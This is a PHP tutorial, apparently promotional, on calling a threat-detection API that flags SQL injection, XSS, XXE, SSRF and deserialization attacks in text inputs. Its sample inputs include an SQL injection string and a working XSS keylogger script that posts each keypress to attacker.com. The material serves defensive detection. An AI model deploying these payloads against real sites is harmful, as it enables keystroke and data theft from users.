How to Prevent Multiple Threats from Text Inputs in PHP

Our web applications’ text input fields represent a significant attack surface, and we need to carefully check those inputs for potential threats.

Thankfully, using the ready-to-run PHP examples below, we can take advantage of a free low-code threat detection API capable of identifying multiple common threat types from a text input string.

We can use this solution to identify the following threats:

1. JSON Insecure Deserialization
2. Cross-Site Scripting
3. XML External Entities
4. SQL Injection
5. Server-Side Request Forgery URLs

We can test this on our own with generic (inert) threat strings in each threat category. For example, if we test with the basic SQL Injection string below:

' OR '1'='1

We’ll receive the following API response:

{
  "Successful": true,
  "CleanResult": false,
  "ContainedJsonInsecureDeserializationAttack": false,
  "ContainedXssThreat": false,
  "ContainedXxeThreat": false,
  "ContainedSqlInjectionThreat": true,
  "ContainedSsrfThreat": false,
  "IsXML": false,
  "IsJSON": false,
  "IsURL": false,
  "OriginalInput": "' OR '1'='1"
}

And if we test with a basic XSS example:

<script>
document.onkeypress = function(e) {
  var xhttp = new XMLHttpRequest();
  xhttp.open("POST", "http://attacker.com/log", true);
  xhttp.send("key=" + e.key);
};
</script>

We’ll get the following response:

{
  "Successful": true,
  "CleanResult": false,
  "ContainedJsonInsecureDeserializationAttack": false,
  "ContainedXssThreat": true,
  "ContainedXxeThreat": false,
  "ContainedSqlInjectionThreat": false,
  "ContainedSsrfThreat": false,
  "IsXML": false,
  "IsJSON": false,
  "IsURL": false,
  "OriginalInput": "<script>\ndocument.onkeypress = function(e) {\n  var xhttp = new XMLHttpRequest();\n  xhttp.open("
}

The “CleanResult”: false value indicates a threat was identified, and the following Boolean values specify which threat was detected. Below that, we’ll get information on the specific type of input processed (XML data, JSON data, or a URL), and the original input will be reiterated at the very end.

Before we copy code examples to call this API, let’s first grab a free API key to authorize our requests. With a free Cloudmersive API key, we’ll be able to make up to 800 API calls per month with zero additional commitments.

Let’s now install the PHP client with Composer by executing the following command:

composer require cloudmersive/cloudmersive_security_api_client

After that, let’s copy the below code examples to call the multi-threat detection function:

<?php
require_once(__DIR__ . '/vendor/autoload.php');

// Configure API key authorization: Apikey
$config = Swagger\Client\Configuration::getDefaultConfiguration()->setApiKey('Apikey', 'YOUR_API_KEY');



$apiInstance = new Swagger\Client\Api\ContentThreatDetectionApi(
    
    
    new GuzzleHttp\Client(),
    $config
);
$value = "value_example"; // string | User-facing text input.

try {
    $result = $apiInstance->contentThreatDetectionAutomaticThreatDetectionString($value);
    print_r($result);
} catch (Exception $e) {
    echo 'Exception when calling ContentThreatDetectionApi->contentThreatDetectionAutomaticThreatDetectionString: ', $e->getMessage(), PHP_EOL;
}
?>

And that’s all there is to it — no more code required! We can now protect our web applications from a few different text input threats with a single low-code solution.